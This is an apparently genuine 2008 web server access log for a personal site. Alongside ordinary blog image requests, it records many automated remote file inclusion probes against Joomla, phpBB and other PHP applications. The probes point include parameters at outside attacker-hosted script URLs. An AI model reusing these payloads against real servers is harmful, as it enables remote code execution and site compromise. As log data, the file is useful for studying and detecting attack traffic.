65.49.14.32 - - [07/Aug/2008:11:10:18 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.0" 200 3726 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.0" 200 393216 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.0" 200 458752 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:29 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.0" 200 51084 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:10:33 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:10:34 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.0" 200 458752 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.0" 200 458752 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:36 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:37 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&949 HTTP/1.0" 200 6273 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.0" 200 344712 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
207.44.152.61 - - [07/Aug/2008:11:10:54 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.dogshop.at/poll/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.152.61 - - [07/Aug/2008:11:10:54 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.dogshop.at/poll/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.152.61 - - [07/Aug/2008:11:10:54 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.dogshop.at/poll/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:10:56 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:10:56 -0700] "GET /logs/access_080227.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:10:56 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.152.61 - - [07/Aug/2008:11:11:03 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.dogshop.at/poll/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.215.162.43 - - [07/Aug/2008:11:11:07 -0700] "GET /logs/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.215.162.43 - - [07/Aug/2008:11:11:07 -0700] "GET /errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:11:08 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0138_0.jpg HTTP/1.0" 200 386052 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:11:10 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:11:10 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:11:10 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:11:13 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:11:14 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:11:14 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:11:24 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:11:32 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:11:37 -0700] "GET /logs/access_080303.log/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:11:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.0" 200 332772 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:11:44 -0700] "GET /logs/access_080303.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:11:48 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:52 -0700] "GET /logs/access.log//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:52 -0700] "GET //safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:52 -0700] "GET /logs/access.log//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:52 -0700] "GET /logs//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:53 -0700] "GET //safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:53 -0700] "GET /logs//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:11:11:56 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:11:11:56 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:11:56 -0700] "GET /logs/access_080329.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:11:56 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:11:56 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:58 -0700] "GET /logs/access.log//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:59 -0700] "GET //safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:11:59 -0700] "GET /logs//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:11:59 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:12:02 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.152.61 - - [07/Aug/2008:11:12:02 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.dogshop.at/poll/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:12:08 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:11:12:14 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:11:12:14 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:11:12:19 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:11:12:20 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:11:12:20 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:11:12:25 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:11:12:25 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:11:12:25 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:11:12:30 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:12:31 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:11:12:37 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:12:44 -0700] "GET /logs/access.log//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:12:45 -0700] "GET //safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.74.183 - - [07/Aug/2008:11:12:45 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [07/Aug/2008:11:12:45 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [07/Aug/2008:11:12:45 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:12:45 -0700] "GET /logs//safehtml.php?dir[plugins]=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:13:15 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:13:16 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:13:17 -0700] "GET /logs/access_080126.log//skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:13:19 -0700] "GET //skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:13:23 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:11:13:26 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:11:13:27 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:13:27 -0700] "GET /logs/access_080103.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:13:27 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:13:28 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:13:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:13:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:13:31 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:13:48 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:14:12 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:14:32 -0700] "GET /logs/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:14:32 -0700] "GET /components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:14:33 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:14:33 -0700] "GET /logs/access_080301.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:14:33 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:14:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:14:33 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:14:35 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:14:37 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:14:37 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:11:14:41 -0700] "GET /logs/access_080215.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:14:47 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:14:47 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:15:06 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:15:07 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:07 -0700] "GET /avatar.php?page=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:15:07 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:09 -0700] "GET /logs/access_080212.log/avatar.php?page=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:09 -0700] "GET /logs/avatar.php?page=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:11:15:14 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:11:15:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:11:15:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:17 -0700] "GET /logs/access.log/avatar.php?page=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:23 -0700] "GET /logs/access_080303.log/index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:26 -0700] "GET /logs/index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:15:28 -0700] "GET /index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.803" "www.dmulk.com"
